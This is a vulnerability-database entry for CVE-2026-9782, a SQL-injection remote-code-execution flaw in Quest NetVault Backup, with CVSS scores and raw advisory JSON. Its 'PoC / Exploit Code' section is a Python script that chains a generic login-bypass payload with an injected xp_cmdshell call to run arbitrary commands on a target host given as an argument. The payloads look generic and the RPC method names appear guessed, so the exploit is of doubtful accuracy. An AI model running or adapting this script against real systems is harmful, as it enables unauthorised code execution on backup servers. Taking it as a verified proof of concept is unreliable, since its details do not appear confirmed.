Security Vulnerability Report
中文
CVE-2026-9782 CVSS 8.8 HIGH

CVE-2026-9782

Published: 2026-06-25 00:17:48
Last Modified: 2026-06-25 14:23:56

Description

Quest NetVault Backup NVBUDeviceDrive SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Quest NetVault Backup. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of NVBUDeviceDrive JSON-RPC messages. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of NETWORK SERVICE. Was ZDI-CAN-27633.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Quest NetVault Backup < 14.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-9782 - Quest NetVault Backup NVBUDeviceDrive SQL Injection RCE PoC # Vulnerability: SQL Injection via JSON-RPC message in NVBUDeviceDrive component # Reference: ZDI-CAN-27633, ZDI-26-371 import requests import json import sys TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "target-host" TARGET_PORT = 8443 # Default NetVault Backup web service port TARGET_URL = f"https://{TARGET_HOST}:{TARGET_PORT}/" # Step 1: Attempt authentication bypass def bypass_authentication(session): """ Attempt to bypass the authentication mechanism """ # Authentication bypass payload - specific to NetVault Backup bypass_payload = { "method": "auth.login", "params": ["admin", "' OR '1'='1"], "id": 1 } response = session.post( f"{TARGET_URL}jsonrpc", json=bypass_payload, verify=False ) return response # Step 2: SQL Injection via NVBUDeviceDrive JSON-RPC def exploit_sqli(session, command): """ Exploit SQL injection in NVBUDeviceDrive JSON-RPC message processing """ # SQL injection payload targeting NVBUDeviceDrive sqli_payload = { "method": "NVBUDeviceDrive.process", "params": { "deviceName": f"test'; EXEC xp_cmdshell('{command}'); --", "operation": "query" }, "id": 2 } response = session.post( f"{TARGET_URL}jsonrpc", json=sqli_payload, verify=False ) return response # Step 3: Execute system command via SQL injection def execute_rce(target_host, command="whoami"): """ Full exploitation chain: auth bypass -> SQLi -> RCE """ session = requests.Session() requests.packages.urllib3.disable_warnings() print(f"[*] Target: {target_host}") print(f"[*] Step 1: Attempting authentication bypass...") auth_response = bypass_authentication(session) print(f"[*] Auth response status: {auth_response.status_code}") print(f"[*] Step 2: Sending SQL injection payload...") print(f"[*] Command to execute: {command}") sqli_response = exploit_sqli(session, command) print(f"[*] SQLi response status: {sqli_response.status_code}") if sqli_response.status_code == 200: print(f"[+] Exploitation may have succeeded!") print(f"[+] Response: {sqli_response.text[:500]}") else: print(f"[-] Exploitation failed") return sqli_response if __name__ == "__main__": cmd = sys.argv[2] if len(sys.argv) > 2 else "whoami" execute_rce(TARGET_HOST, cmd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9782", "sourceIdentifier": "[email protected]", "published": "2026-06-25T00:17:48.407", "lastModified": "2026-06-25T14:23:56.107", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quest NetVault Backup NVBUDeviceDrive SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Quest NetVault Backup. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the processing of NVBUDeviceDrive JSON-RPC messages. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of NETWORK SERVICE. Was ZDI-CAN-27633."}], "affected": [{"source": "[email protected]", "affectedData": [{"vendor": "Quest", "product": "NetVault Backup", "defaultStatus": "unknown", "versions": [{"version": "14.0.0.19", "status": "affected"}]}]}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "ssvcV203": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "ssvcData": {"timestamp": "2026-06-25T12:49:21.535645Z", "id": "CVE-2026-9782", "options": [{"exploitation": "none"}, {"automatable": "no"}, {"technicalImpact": "total"}], "role": "CISA Coordinator", "version": "2.0.3"}}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://support.quest.com/technical-documents/netvault/14.0.2/release-notes#TOPIC-2338529", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-371/", "source": "[email protected]"}]}}